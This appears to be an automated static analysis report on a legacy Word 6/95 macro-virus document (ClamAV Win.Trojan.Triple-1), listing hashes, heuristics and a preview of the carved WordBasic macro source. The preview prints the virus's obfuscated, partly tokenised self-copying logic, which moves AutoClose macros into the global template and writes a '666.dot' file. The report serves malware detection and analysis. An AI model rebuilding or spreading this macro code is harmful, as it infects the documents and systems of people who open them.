Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 35192d9a3053b18f…

MALICIOUS

Office (OLE)

7.5 KB First seen: 2012-06-14
MD5: 1879c3d773cc58b58600dbd2dec94780 SHA-1: b45d8f4f3592156ccd72d0e967b90f8c2232f555 SHA-256: 35192d9a3053b18f9f193f6e17ccc1a36eabd83528033697b40dddc923fb1a2e
102 Risk Score

Malware Insights

MITRE ATT&CK
T1059.005 Visual Basic

The sample exhibits legacy WordBasic macro virus markers, specifically "RSN MACRO VIRUS", and is identified by ClamAV as Win.Trojan.Triple-1. The presence of these markers and the ClamAV signature strongly suggests a historical macro-based malware. The document body contains numerous obfuscated strings and references to macro functions like AutoClose, further supporting the macro-based execution.

Heuristics 3

  • ClamAV: Win.Trojan.Triple-1 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Win.Trojan.Triple-1
  • Legacy WordBasic macro-virus markers high OLE_LEGACY_WORDBASIC_MACRO_VIRUS
    OLE Word document contains legacy WordBasic auto-execution macro markers such as AutoOpen plus ToolsMacro/MacroFile/fileMacro/globMacro or named historical macro-virus strings. These old Word 6/95 macro forms are not exposed as a modern VBA project, so normal VBA source extraction can miss them.
  • Recovered legacy WordBasic macro source info OLE_LEGACY_WORDBASIC_MACRO_SOURCE
    The Word 6.0/95 document stores tokenised WordBasic macros in the WordDocument stream rather than as a modern VBA project, so VBA source extraction cannot see them. The macro source was detokenised and carved so its identifiers, string literals (file paths, URLs, registry keys, message text) and comments are available for review and signature scanning.

Extracted artifacts 1

Files carved from inside the sample during analysis.

FilenameKindSourceSize
wordbasic_macros.txt wordbasic-macro analyzer.wordbasic (detokenised Word 6/95 WordBasic macro source) 1860 bytes
SHA-256: 6642e68325f6cfc15b08e0b402e16817902c1f05d95a066787ae6ccfba23ef2f
Preview script
First 1,000 lines of the extracted script
26465
RTVLKGRJBMAUBETIJC
TKCIICTPDQQBBU
PJFMQNNSRLDRIVH
SUUSFDKFUIMVBOGOBM$
MAIN
, -
PJFMQNNSRLDRIVH = 8
TKCIICTPDQQBBU = 0
@cmd809e TKCIICTPDQQBBU
SUUSFDKFUIMVBOGOBM$ = @cmd818c PJFMQNNSRLDRIVH
RTVLKGRJBMAUBETIJC = 1
GUIUDGBAHGRGNIBQ RTVLKGRJBMAUBETIJC PTMJISGJPKGTVOIHRN
@cmd80c2 "Global:AutoClose" , "666:AutoClose"
@cmd00d7 = "AutoClose" , = RTVLKGRJBMAUBETIJC ,
@cmd80a3 RTVLKGRJBMAUBETIJC
@cmd8183 SUUSFDKFUIMVBOGOBM$ = "\666.dot" , TKCIICTPDQQBBU
dlg @cmd00d7
dlg
dlg
@cmd00d7 dlg
@cmd8183 SUUSFDKFUIMVBOGOBM$ = "\666.dot" , RTVLKGRJBMAUBETIJC
@cmd80c2 "666:AutoClose" , "Global:AutoClose"
@cmd80a3 RTVLKGRJBMAUBETIJC
@cmd809e RTVLKGRJBMAUBETIJC
PTMJISGJPKGTVOIHRN
, -
dlg @cmd00d7
dlg
dlg
@cmd00d7 dlg
@cmd809e RTVLKGRJBMAUBETIJC
@cmd8147 RTVLKGRJBMAUBETIJC
GUIUDGBAHGRGNIBQ
RKTPQESOJOTUK = TKCIICTPDQQBBU @cmd80b7 TKCIICTPDQQBBU
@cmd80b8 RKTPQESOJOTUK , TKCIICTPDQQBBU = "AutoClose" GUIUDGBAHGRGNIBQ = RTVLKGRJBMAUBETIJC
RKTPQESOJOTUK
REDUCKNJEFPMGI
VGFRTGMIJLNBFSEK
GTETPERLDAVIT
AEGLTKNENVLPTEFTQBA$
MAIN
, -
GTETPERLDAVIT = 0
VGFRTGMIJLNBFSEK = 8
@cmd809e GTETPERLDAVIT
AEGLTKNENVLPTEFTQBA$ = @cmd818c VGFRTGMIJLNBFSEK
REDUCKNJEFPMGI = 1
SNARRNTPUTCOFHGEO REDUCKNJEFPMGI DFCOCTENIMUNPGHQOKV
@cmd80c2 "Global:AutoClose" , "666:AutoClose"
@cmd00d7 = "AutoClose" , = REDUCKNJEFPMGI ,
@cmd80a3 REDUCKNJEFPMGI
@cmd8183 AEGLTKNENVLPTEFTQBA$ = "\666.dot" , GTETPERLDAVIT
dlg @cmd0057
dlg
dlg
@cmd0057 dlg
@cmd8183 AEGLTKNENVLPTEFTQBA$ = "\666.dot" , REDUCKNJEFPMGI
@cmd80c2 "666:AutoClose" , "Global:AutoClose"
@cmd80a3 REDUCKNJEFPMGI
@cmd809e REDUCKNJEFPMGI
DFCOCTENIMUNPGHQOKV
, -
dlg @cmd0057
dlg
dlg
@cmd0057 dlg
@cmd809e REDUCKNJEFPMGI
@cmd8147 REDUCKNJEFPMGI
SNARRNTPUTCOFHGEO
GQIDNJAQKKNFCRLTQAC = GTETPERLDAVIT @cmd80b7 GTETPERLDAVIT
@cmd80b8 GQIDNJAQKKNFCRLTQAC , GTETPERLDAVIT = "AutoClose" SNARRNTPUTCOFHGEO = REDUCKNJEFPMGI
GQIDNJAQKKNFCRLTQAC